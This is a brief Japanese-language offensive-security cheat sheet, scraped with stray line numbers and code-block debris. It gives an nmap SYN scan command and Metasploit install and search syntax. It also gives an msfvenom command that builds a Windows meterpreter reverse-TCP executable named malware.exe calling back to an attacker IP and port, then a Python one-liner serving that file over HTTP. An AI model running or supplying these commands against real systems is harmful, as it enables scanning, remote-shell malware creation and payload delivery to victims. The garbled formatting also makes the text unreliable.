1 2
- !
# TCP SYNスキャン, バナー表示 nmap -sS -A <IP>
1
apt-get install metasploit-framework
msfconsole
1 2 3 4 5 6 7
- ! - !
search -s <文字列> # keywordは、cveやarch, platform, typeなど様々ある(search -hで確認できる) search <keyword>:<value> # e.g. search cve:2018 type:exploit app:client
1 2 3 4
msfvenom -a <アーキテクチャ> --platform <プラットフォーム> -p <ペイロード> LHOST=<接続先IP> LPORT=<接続先ポート番号> -f <フォーマット> -o <出力先パス> # e.g. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=111.222.333.444 LPORT=8080 -f exe -o malware.exe
1 2 3
# カレントディレクトリをWeb公開 cd <公開ディレクトリ> python -m SimpleHTTPServer <ポート番号>